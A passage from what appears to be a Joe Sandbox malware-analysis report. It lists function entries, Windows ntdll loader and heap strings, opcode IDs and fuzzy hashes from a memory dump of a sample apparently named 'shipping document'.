                                                                                                Function 017A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 017A2DF0: LdrInitializeThunk.NTDLL ref: 017A2DFA
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0BA3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0BB6
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0D60
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0D74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 1404860816-0
                                                                                                • Opcode ID: b41b35957bb4c76e99dbdd24beae62ca179a3687996cb81f2bc46277c478e7e3
                                                                                                • Instruction ID: f3146a7843bee1ef7c1c05db066cf025155f07ecb53f8a189e82b7ab3e490074
                                                                                                • Opcode Fuzzy Hash: b41b35957bb4c76e99dbdd24beae62ca179a3687996cb81f2bc46277c478e7e3
                                                                                                • Instruction Fuzzy Hash: 01426E72900715DFDB21CF28C844BAAB7F5FF48304F5445A9EA89EB245E770AA84CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0176A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                • API String ID: 0-379654539
                                                                                                • Opcode ID: e8bd3b120f70fc45faaefa1af4ad1805c4e96d327522d2b5bfd6719ffbc03333
                                                                                                • Instruction ID: 35396c0539e3060813e456b148e66ae826f2083e84559fdf350d39d61060bd23
                                                                                                • Opcode Fuzzy Hash: e8bd3b120f70fc45faaefa1af4ad1805c4e96d327522d2b5bfd6719ffbc03333
                                                                                                • Instruction Fuzzy Hash: 04C16A741083828FD721DF58C444B6AFBE8BF94704F0449AEFD96AB252E734DA49CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01798402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • @, xrefs: 01798591
                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0179855E
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01798421
                                                                                                • LdrpInitializeProcess, xrefs: 01798422
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1918872054
                                                                                                • Opcode ID: bc38954fcd5db90002fd3039c34bbbb8c8cc0661a3678c881ec856bcb1bc4bc5
                                                                                                • Instruction ID: c216963be92c2b096dbac40c3230358b786a629d983e04e0b7d6885f59845fe1
                                                                                                • Opcode Fuzzy Hash: bc38954fcd5db90002fd3039c34bbbb8c8cc0661a3678c881ec856bcb1bc4bc5
                                                                                                • Instruction Fuzzy Hash: FA918C71508349AFDB21DF65CC44FABFBE8BF95644F80092EFA8496155E334D9088B63
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017D21D9, 017D22B1
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017D22B6
                                                                                                • .Local, xrefs: 017928D8
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017D21DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                • API String ID: 0-1239276146
                                                                                                • Opcode ID: 6fe67083a16c6bc2ac0d9380f3adf53dbef7e336c89c520de728ba5d6915a883
                                                                                                • Instruction ID: 95d8a030db26ecdd5c4cba603a8fce7a7ed4eefc16fc59fb531cfc27035adf85
                                                                                                • Opcode Fuzzy Hash: 6fe67083a16c6bc2ac0d9380f3adf53dbef7e336c89c520de728ba5d6915a883
                                                                                                • Instruction Fuzzy Hash: 72A1B231944229EBDF24DF68DC88BA9F7B1BF58314F1541E9E908AB252D7309E85CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01794AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017D342A
                                                                                                • RtlDeactivateActivationContext, xrefs: 017D3425, 017D3432, 017D3451
                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017D3456
                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017D3437
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                • API String ID: 0-1245972979
                                                                                                • Opcode ID: 3191772e8e8b0956b20116f8ca9c61b81f1b0f4709160fc2cd77c2f6a348e681
                                                                                                • Instruction ID: 6fe8eb5a896a6a3023aedf3e92355348236d404389858ed820328425964279fd
                                                                                                • Opcode Fuzzy Hash: 3191772e8e8b0956b20116f8ca9c61b81f1b0f4709160fc2cd77c2f6a348e681
                                                                                                • Instruction Fuzzy Hash: 6B6123B2600B169FDB22CF1CD981B3AF7E5EF84B50F14855DE9569B240D738E806CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017C10AE
                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017C0FE5
                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017C1028
                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017C106B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                • API String ID: 0-1468400865
                                                                                                • Opcode ID: 14a2df83f193dbdb686667305263a042e605ea83d48a9165195e7892cf2a1e18
                                                                                                • Instruction ID: 86e088c623f3259d90c473198631ef57a6096b023a6735a825141743178a3963
                                                                                                • Opcode Fuzzy Hash: 14a2df83f193dbdb686667305263a042e605ea83d48a9165195e7892cf2a1e18
                                                                                                • Instruction Fuzzy Hash: C871AFB19043469FCB21DF18C889B9BBBACAF94764F900568FD488B14BD774D588CBD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0178245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • apphelp.dll, xrefs: 01782462
                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017CA992
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017CA9A2
                                                                                                • LdrpDynamicShimModule, xrefs: 017CA998
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-176724104
                                                                                                • Opcode ID: 94f5928e9aa4ca03b2b69bbc8716645bd4c4d3411537a2e887d46b08848db3f1
                                                                                                • Instruction ID: b4dc05899ec2bc9a0e5f541ddad0696280955bd4b8488703ccde87ac66d80d08
                                                                                                • Opcode Fuzzy Hash: 94f5928e9aa4ca03b2b69bbc8716645bd4c4d3411537a2e887d46b08848db3f1
                                                                                                • Instruction Fuzzy Hash: 3A314A75A40306EBDB319F5DD889AAAFBB4FB84B05F25005DFC0067249E7745A81CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0177327D
                                                                                                • HEAP[%wZ]: , xrefs: 01773255
                                                                                                • HEAP: , xrefs: 01773264
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                • API String ID: 0-617086771
                                                                                                • Opcode ID: 8eef44d120db120107fb9c7289b54ce6605f334760564bf23f0af2715fbb0b4a
                                                                                                • Instruction ID: 104713f435681b56430856689a69ac4d8b8fe35883961feebcc3dd3d7bd4aea5
                                                                                                • Opcode Fuzzy Hash: 8eef44d120db120107fb9c7289b54ce6605f334760564bf23f0af2715fbb0b4a
                                                                                                • Instruction Fuzzy Hash: 1092AA71A042499FEF25CF68C444BAEFBF1FF48300F188499E899AB392D735A941DB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01770770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-4253913091
                                                                                                • Opcode ID: 5315dc77443528f041c8b39db6855f51ca87946bf7938e084352979682f10737
                                                                                                • Instruction ID: 0d66673bfd8c15b4a677788fe2ec4d51b1bd83c70eb4f74a5fb0087506adaa5b
                                                                                                • Opcode Fuzzy Hash: 5315dc77443528f041c8b39db6855f51ca87946bf7938e084352979682f10737
                                                                                                • Instruction Fuzzy Hash: A5F18A70700606DFEB25CF68C884B6AF7B6FB46704F1481ACE5169B392D734EA81CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01786962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $@
                                                                                                • API String ID: 0-1077428164
                                                                                                • Opcode ID: 5339e48a542bf3e37beddd6d96b7c68f3f9a22ddbce6a257e8d54adee83012da
                                                                                                • Instruction ID: fc6c21d817e54c70be35d66c06508af9e721846467414b65a2521eaeefdb6158
                                                                                                • Opcode Fuzzy Hash: 5339e48a542bf3e37beddd6d96b7c68f3f9a22ddbce6a257e8d54adee83012da
                                                                                                • Instruction Fuzzy Hash: FAC29F716483419FEB29DF28C881BABFBE5AF88714F14892DF98AC7241D734D845CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0175A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                • API String ID: 0-2779062949
                                                                                                • Opcode ID: 736501d5d22d6080061c25bce4a5a70dfca89a3c9c6dd61ac23a608deda04171
                                                                                                • Instruction ID: 28bd92cd9596d3725b3513a5b9888c840cf7106d369130531e86a0d9291413b5
                                                                                                • Opcode Fuzzy Hash: 736501d5d22d6080061c25bce4a5a70dfca89a3c9c6dd61ac23a608deda04171
                                                                                                • Instruction Fuzzy Hash: BBA15A719112299BDB329F68CC88BEAF7B8EF44700F1041E9EA09A7251E7759F85CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01780BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017CA121
                                                                                                • LdrpCheckModule, xrefs: 017CA117
                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 017CA10F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-161242083
                                                                                                • Opcode ID: 0a864dd8ea5a4894bd5156d3a28bf4010cc7b3ede8396b95b2a986ef7bd28659
                                                                                                • Instruction ID: 33ecd60f577bf39517f78d880154d8445b97c27ba58421a1a65985a4e3859d21
                                                                                                • Opcode Fuzzy Hash: 0a864dd8ea5a4894bd5156d3a28bf4010cc7b3ede8396b95b2a986ef7bd28659
                                                                                                • Instruction Fuzzy Hash: BE71AD71A403099FDB25EF68C985ABEF7B4FB84704F14446DE802AB255E734AA85CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01770A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-1334570610
                                                                                                • Opcode ID: a6422434b2dbde2e265ba2de9998aef86103328980d784575337b3766e188846
                                                                                                • Instruction ID: fe8b001c537cca5c248dfd9784e35158710102f95ed9395850833eed2c58a640
                                                                                                • Opcode Fuzzy Hash: a6422434b2dbde2e265ba2de9998aef86103328980d784575337b3766e188846
                                                                                                • Instruction Fuzzy Hash: A6618D70600301DFDB29DF28C884B6AFBE1FF46708F14859EE8598B296D771E981CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017D82E8
                                                                                                • Failed to reallocate the system dirs string !, xrefs: 017D82D7
                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017D82DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1783798831
                                                                                                • Opcode ID: b59693743604ec50b5985189381d03f72dd65a6634815738ae0eda2cb708e1d9
                                                                                                • Instruction ID: 23e68e25b0f12eb4c041d72215f27fb6fe0ff1022d7ef9e66dd1e8eaae00648f
                                                                                                • Opcode Fuzzy Hash: b59693743604ec50b5985189381d03f72dd65a6634815738ae0eda2cb708e1d9
                                                                                                • Instruction Fuzzy Hash: 8B412471544305ABCF21EB68EC48B5FFBE8EF48750F10092AF958D3255EB74D9048BA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0181C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • PreferredUILanguages, xrefs: 0181C212
                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0181C1C5
                                                                                                • @, xrefs: 0181C1F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                • API String ID: 0-2968386058
                                                                                                • Opcode ID: 32ac428c633b9dcfe5b2e0a396d9220f5f9333eb719490a1f9add05b3ee4cc2f
                                                                                                • Instruction ID: e2a37f0e8964f34ad8ae4af601e48e91b1cb92ecc0674859c1721ff71ecee24b
                                                                                                • Opcode Fuzzy Hash: 32ac428c633b9dcfe5b2e0a396d9220f5f9333eb719490a1f9add05b3ee4cc2f
                                                                                                • Instruction Fuzzy Hash: 82417172A4020AEBDF11DAD8C855FEEFBBCAB54704F10416AEA09E7244D7B49B448B50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                • API String ID: 0-1373925480
                                                                                                • Opcode ID: 306cf279384ed7824203b678e0d8c67ebaee5562b36b68555a055fe83df37ee3
                                                                                                • Instruction ID: 732e27b363f870c9eda45824540a1fffb2d26176601f2c05eebf220d31b96af8
                                                                                                • Opcode Fuzzy Hash: 306cf279384ed7824203b678e0d8c67ebaee5562b36b68555a055fe83df37ee3
                                                                                                • Instruction Fuzzy Hash: BB410432A042588BEB25DBE8C848BAFFBB8FF55340F14046EDA02EB785D7348901CB11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • LdrpCheckRedirection, xrefs: 017E488F
                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017E4888
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 017E4899
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-3154609507
                                                                                                • Opcode ID: 9202f43f039b6929dc6fc7fa470abe0a163922c27a1732339c6133d2c82c5755
                                                                                                • Instruction ID: 9928a0d97a745d94edb94796c45592055475b7f76f279441faeea907c55a2bfa
                                                                                                • Opcode Fuzzy Hash: 9202f43f039b6929dc6fc7fa470abe0a163922c27a1732339c6133d2c82c5755
                                                                                                • Instruction Fuzzy Hash: 9241B072A847519FCB21CE6DD848A26FBE5EF8D650F060669ED4AD7211D730DC00CBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01770BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-2558761708
                                                                                                • Opcode ID: aef82800622aa95b867b4b7ff8ebfec226bc2fdd9e9b07bc326fe6c2cc323ce6
                                                                                                • Instruction ID: 49b7828f29f461fd2d5b1a2c6f79357e4f6b6c2b14a79ce435dffc946e69fee6
                                                                                                • Opcode Fuzzy Hash: aef82800622aa95b867b4b7ff8ebfec226bc2fdd9e9b07bc326fe6c2cc323ce6
                                                                                                • Instruction Fuzzy Hash: 8D11DC71314102DFDB29CA18C854F3AF3A5EF42B16F1881ADF406CB266DB70EA80C750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017E20F3
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017E2104
                                                                                                • LdrpInitializationFailure, xrefs: 017E20FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2986994758
                                                                                                • Opcode ID: 4866256c84eb6a756245668636329dfcdfba3e441ee3a3ef1783038e04f30c95
                                                                                                • Instruction ID: a84758757a1ba54ff355bec906689a7c717aaa4634c464eef6519df8460ea440
                                                                                                • Opcode Fuzzy Hash: 4866256c84eb6a756245668636329dfcdfba3e441ee3a3ef1783038e04f30c95
                                                                                                • Instruction Fuzzy Hash: 26F0C8757803087BE724E64CDC5AF99BBECEB85B54F500069FA006B286D6F0A750CE51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: #%u
                                                                                                • API String ID: 48624451-232158463
                                                                                                • Opcode ID: 1df450fc4c1f03ef15c66b8fd18d8711296eab9ed135dd1557837d83fad7ed38
                                                                                                • Instruction ID: 69171e47c99cb946186a2c83abdf9f9cfdd3bdef6a498a6015a4376b732bb009
                                                                                                • Opcode Fuzzy Hash: 1df450fc4c1f03ef15c66b8fd18d8711296eab9ed135dd1557837d83fad7ed38
                                                                                                • Instruction Fuzzy Hash: 9B714771A0014A9FDB01DFA8C994FAEBBF8BF18704F154069E905E7255EB34EA41CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0176A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • LdrResSearchResource Enter, xrefs: 0176AA13
                                                                                                • LdrResSearchResource Exit, xrefs: 0176AA25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                • API String ID: 0-4066393604
                                                                                                • Opcode ID: b4e30560f0b8ce557ac37bdc8d243b8c6a45bef40f193b6ab91acacc538b8a67
                                                                                                • Instruction ID: 3b9ba77c83adea65a823e2f570ff529b0348ea0ca26825cf2e9345a83d53fb62
                                                                                                • Opcode Fuzzy Hash: b4e30560f0b8ce557ac37bdc8d243b8c6a45bef40f193b6ab91acacc538b8a67
                                                                                                • Instruction Fuzzy Hash: 99E17971A00219AFEB228E99C984BAEFBBAFF58710F14446EED01F7255E7349940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0182A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `$`
                                                                                                • API String ID: 0-197956300
                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                • Instruction ID: a7a919059477fadb96693cfa077e598ed2d5ea9a98e2728b4eeeeace3c33123e
                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                • Instruction Fuzzy Hash: 6FC1E3312043529FEB2ACF28C844B6BBBE5AFC4318F044A2DF696C7691D775D685CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
